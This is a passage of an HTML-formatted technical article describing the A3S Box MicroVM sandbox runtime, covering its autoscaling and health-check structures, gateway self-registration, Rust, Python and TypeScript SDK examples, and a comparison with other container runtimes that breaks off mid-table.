    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;service&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;replicas&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;ScaleConfig&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// image, vcpus, memory_mib, env, port_map&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;request_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ScaleResponse&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;request_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;accepted&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;current_replicas&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;target_replicas&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;instances&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;InstanceInfo&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  18.6 Instance Health Checks
&lt;/h3&gt;

&lt;p&gt;Each instance continuously reports health status:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;InstanceHealth&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;cpu_percent&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;f32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;memory_bytes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;inflight_requests&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;healthy&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Health check data is used simultaneously for:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;BoxAutoscaler scaling decisions&lt;/li&gt;
&lt;li&gt;Load balancer traffic distribution&lt;/li&gt;
&lt;li&gt;Alert system anomaly detection&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  18.7 Gateway Self-Registration
&lt;/h3&gt;

&lt;p&gt;After a MicroVM instance starts, it self-registers with A3S Gateway via &lt;code&gt;InstanceRegistration&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;InstanceRegistration&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;instance_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;service&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;endpoint&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="c1"&gt;// Instance access address&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;health&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;InstanceHealth&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;metadata&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;HashMap&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When an instance stops, it sends &lt;code&gt;InstanceDeregistration&lt;/code&gt; to cancel registration. This self-registration mechanism allows the Gateway to automatically discover and route to new instances without manual configuration.&lt;/p&gt;




&lt;h2&gt;
  
  
  19. SDK Ecosystem: Unified Rust, Python, and TypeScript
&lt;/h2&gt;

&lt;h3&gt;
  
  
  19.1 SDK Architecture
&lt;/h3&gt;

&lt;p&gt;A3S Box's SDK uses a "implement once, bind to multiple languages" architecture:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;+-----------------------------------------+
|              a3s-box-sdk (Rust)          |
|         Core: BoxSdk + BoxSandbox        |
+----------+------------+------------------+
|  Rust    |   Python   |  TypeScript      |
|  Native  |  PyO3      |  napi-rs         |
|  API     |  bindings  |  bindings        |
|          |  (async)   |  (async)         |
+----------+------------+------------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Core logic is implemented once in Rust, then native bindings are generated via PyO3 (Python) and napi-rs (TypeScript/Node.js). This ensures the behavior of all three SDKs is completely consistent, while enjoying Rust's performance and safety.&lt;/p&gt;

&lt;h3&gt;
  
  
  19.2 Rust SDK
&lt;/h3&gt;

&lt;p&gt;The Rust SDK is the lowest-level interface, providing complete type safety and zero-cost abstractions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;a3s_box_sdk&lt;/span&gt;&lt;span class="p"&gt;::{&lt;/span&gt;&lt;span class="n"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SandboxOptions&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="nd"&gt;#[tokio::main]&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Create SDK instance&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// None = use default home_dir&lt;/span&gt;

    &lt;span class="c1"&gt;// Create sandbox&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sdk&lt;/span&gt;&lt;span class="nf"&gt;.create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SandboxOptions&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"python:3.11"&lt;/span&gt;&lt;span class="nf"&gt;.to_string&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
        &lt;span class="n"&gt;vcpus&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;memory_mib&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="nn"&gt;Default&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="p"&gt;}))&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;// Execute command&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sandbox&lt;/span&gt;&lt;span class="nf"&gt;.exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s"&gt;"python"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"-c"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"print('hello')"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nd"&gt;println!&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"{}"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="py"&gt;.stdout&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="c1"&gt;// Sandbox is automatically cleaned up on drop&lt;/span&gt;
    &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(())&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  19.3 Python SDK
&lt;/h3&gt;

&lt;p&gt;The Python SDK bridges via PyO3, providing a Pythonic async interface:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;asyncio&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;a3s_box&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SandboxOptions&lt;/span&gt;

&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# Create SDK instance
&lt;/span&gt;    &lt;span class="n"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# Create sandbox
&lt;/span&gt;    &lt;span class="n"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sdk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;SandboxOptions&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python:3.11&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;vcpus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;memory_mib&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# Execute command
&lt;/span&gt;    &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sandbox&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-c&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;print(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;hello&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;asyncio&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key design decisions for PyO3 bindings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use &lt;code&gt;py.allow_threads&lt;/code&gt; to release the GIL, ensuring Rust's async operations don't block Python's event loop&lt;/li&gt;
&lt;li&gt;Maintain an internal Tokio Runtime to bridge Python's synchronous calls to Rust's async world&lt;/li&gt;
&lt;li&gt;Type mapping: Rust's &lt;code&gt;Result&amp;lt;T&amp;gt;&lt;/code&gt; -&amp;gt; Python exceptions, Rust's &lt;code&gt;Option&amp;lt;T&amp;gt;&lt;/code&gt; -&amp;gt; Python's &lt;code&gt;None&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  19.4 TypeScript SDK
&lt;/h3&gt;

&lt;p&gt;The TypeScript SDK generates native Node.js modules via napi-rs:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;SandboxOptions&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;@a3s/box&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Create SDK instance&lt;/span&gt;
    &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

    &lt;span class="c1"&gt;// Create sandbox&lt;/span&gt;
    &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;sdk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
        &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;node:20&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="na"&gt;vcpus&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="na"&gt;memoryMib&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;

    &lt;span class="c1"&gt;// Execute command&lt;/span&gt;
    &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;sandbox&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;node&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;-e&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;console.log("hello")&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The advantage of napi-rs is that it generates a true native module (&lt;code&gt;.node&lt;/code&gt; file), not via FFI or subprocess calls. This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Zero serialization overhead (data passed directly between V8 heap and Rust heap)&lt;/li&gt;
&lt;li&gt;Complete TypeScript type definitions (auto-generated &lt;code&gt;.d.ts&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Supports async/await (via Tokio and libuv integration)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  19.5 Multi-Platform Builds
&lt;/h3&gt;

&lt;p&gt;SDK native bindings need to be compiled separately for each target platform. A3S Box implements multi-platform builds via GitHub Actions CI matrix:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Python wheels&lt;/th&gt;
&lt;th&gt;Node.js modules&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Linux x86_64&lt;/td&gt;
&lt;td&gt;maturin&lt;/td&gt;
&lt;td&gt;napi-rs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux aarch64&lt;/td&gt;
&lt;td&gt;maturin&lt;/td&gt;
&lt;td&gt;napi-rs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS x86_64&lt;/td&gt;
&lt;td&gt;maturin&lt;/td&gt;
&lt;td&gt;napi-rs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS aarch64 (Apple Silicon)&lt;/td&gt;
&lt;td&gt;maturin&lt;/td&gt;
&lt;td&gt;napi-rs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Python wheels are built via &lt;code&gt;maturin&lt;/code&gt; and published to PyPI; Node.js modules are built via &lt;code&gt;napi-rs&lt;/code&gt; and published to npm. Users only need &lt;code&gt;pip install a3s-box&lt;/code&gt; or &lt;code&gt;npm install @a3s/box&lt;/code&gt;, and the package manager automatically selects the correct platform variant.&lt;/p&gt;




&lt;h2&gt;
  
  
  20. Comparative Analysis with Existing Solutions
&lt;/h2&gt;

&lt;h3&gt;
  
  
  20.1 Container Runtime Landscape
&lt;/h3&gt;

&lt;p&gt;The current container runtime ecosystem can be divided into four levels by isolation strength:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Isolation strength ^
                   |
                   |  +------------------------------------------+
                   |  | A3S Box (TEE mode)                        |
                   |  | MicroVM + memory encryption + 7-layer defense |
                   |  +------------------------------------------+
                   |  +------------------------------------------+
                   |  | A3S Box (standard mode) / Kata Containers  |
                   |  | MicroVM + independent kernel               |
                   |  +------------------------------------------+
                   |  +------------------------------------------+
                   |  | gVisor                                     |
                   |  | Userspace kernel (syscall interception)    |
                   |  +------------------------------------------+
                   |  +------------------------------------------+
                   |  | runc (Docker default)                      |
                   |  | Shared kernel + namespace + cgroup         |
                   |  +------------------------------------------+
                   |
                   +-------------------------------------------&amp;gt; Performance overhead
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  20.2 Detailed Comparison
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;runc (Docker)&lt;/th&gt;
&lt;th&gt;gVisor&lt;/th&gt;
&lt;th&gt;Kata Containers&lt;/th&gt;
&lt;th&gt;Firecracker&lt;/th&gt;
&lt;th&gt;A3S Box&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Isolation mechanism&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;namespace + cgroup&lt;/td&gt;
&lt;td&gt;Userspace kernel&lt;/td&gt;
&lt;td&gt;MicroVM (QEMU/CLH)&lt;/td&gt;
&lt;td&gt;MicroVM (KVM)&lt;/td&gt;
&lt;td&gt;MicroVM (libkrun)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Kernel isolation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Shared&lt;/td&gt;
&lt;td&gt;Partial (Sentry)&lt;/td&gt;
&lt;td&gt;Independent&lt;/td&gt;
&lt;td&gt;Independent&lt;/td&gt;
&lt;td&gt;Independent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cold start&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~50ms&lt;/td&gt;
&lt;td&gt;~150ms&lt;/td&gt;
&lt;td&gt;~500ms-2s&lt;/td&gt;
&lt;td&gt;~125ms&lt;/td&gt;
&lt;td&gt;~200ms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Memory overhead&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~5 MB&lt;/td&gt;
&lt;td&gt;~15 MB&lt;/td&gt;
&lt;td&gt;~30-50 MB&lt;/td&gt;
&lt;td&gt;~5 MB&lt;/td&gt;
&lt;td&gt;~10 MB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TEE support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (SEV-SNP, TDX planned)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;macOS support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (Docker Desktop)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (native HVF)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Docker CLI compat&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;Via shimv2&lt;/td&gt;
